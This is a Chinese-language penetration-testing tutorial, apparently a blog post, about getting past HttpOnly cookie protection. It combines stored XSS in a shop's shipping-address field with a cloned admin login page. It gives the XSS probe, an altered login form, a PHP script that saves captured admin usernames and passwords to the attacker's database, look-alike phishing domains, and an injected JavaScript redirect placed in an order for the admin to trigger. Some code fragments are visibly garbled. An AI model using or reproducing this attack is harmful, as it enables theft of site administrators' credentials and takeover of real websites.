接着是黑客写的,黑客不好听,换成渗透吧。
简而言之,HttpOnly可以有效地防止XSS站点之间的攻击窃取cookie
很多人在遇到HttpOnly的时候直接放弃了XSS攻击方法,但今天在这里分享了我脑海形成很久了,但因为太懒而无法实现的想法。
正文开始
来到收货地址这里,在详细地址处发现了XSS攻击,最后代码测试,果真存在
<script>alert("XSS")</script>弹框成功。
但是现在我们因为httponly而无法获取到重要的JSESSIONID
这个时候大家需要准备以下工具:
1.域名一个
2.服务器一台(虚拟机也可)
3.基础的代码功底(html+php)
4.一天或者1小时的时间
准备好了这些东西,现在咋们开始找到网站的后台。
通过xss攻击我们发现后台路径是manage/user/login
接着我们打开后台看看
接着我需要你们的单击右键(火狐)另存页面到桌面。
然后
页面源码就被脱了下来,接着开始使用基础的代码知识
源代码
<blockquote><formrole="form"id="formLogin"action="/manage/user/login"method="post">
被更改后的
<blockquote><formrole="form"id="formLogin"action=";method="post">
接着创建一个index.php
这个是将在输入框输入的账户密码保存到数据库去,这样达到获取账户密码的目的。<?phpheader("content-type:text/html;charset=utf-8");include ';; // 1.连接 //@号是阻止警告输出 $link = @mysqli_connect('localhost','数据库账户','密码','数据库名字') or exit('连接失败!原因:' . mysqli_connect_error() . '错误号:' .mysqli_connect_errno() ); if($_POST){//判断是否是POST请求,如果是POST就进来 //$_post不用大写的就没用得 //这个是三元运算符 判断是否有值,如果没有值那么就为空 $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; // 2.设置字符集 mysqli_set_charset($link , 'utf8'); // 3.sql语句 $sql ="INSERT INTO admin(username, password) VALUES ('{$username}','{$password}')"; // 4.发送 $result = mysqli_query($link , $sql); // 如果执行成功 和受影响行大于 0 if($result && mysqli_affected_rows($link) > 0){ return mysqli_insert_id($link) ? mysqli_insert_id($link) : mysqli_affected_rows($link); } //5.断开链接 mysqli_close($link); }接着第三个php文件,(保存问)
这是登陆成功后让他通过js跳转方法跳转到他网站真正的后台<script>window.loca;http://www.*.com/manager/user/login';</script>钓鱼网页制作完毕!
这里考虑到了验证码的不停变换的原因,我给他来了一个指定图片
然后用一个域名,做如下解析
www-被欺骗网站域名(比如:baidu)-com-adminlogin.(你所购买的域名).top
www-baidu-com-adminlogin.ce
然后在把钓鱼页面传到服务器。服务器也做绑定域名的操作
接着来到收货地址处,开始插入我们的跳转代码
接着前台下单<script>window.loca;http://www-baidu-com-adminlogin.ce/index.html';</script>然后坐等管理员审核我们订单,那么当管理员审核我们订单会发生什么事?
第一:首先管理员看见我们订单后会自动跳转到我们的钓鱼页面,
第二:管理员突然发现自己自动退出了后台,于是肯定会再次登录(中计)
第三:我们的数据库收取到他的账户密码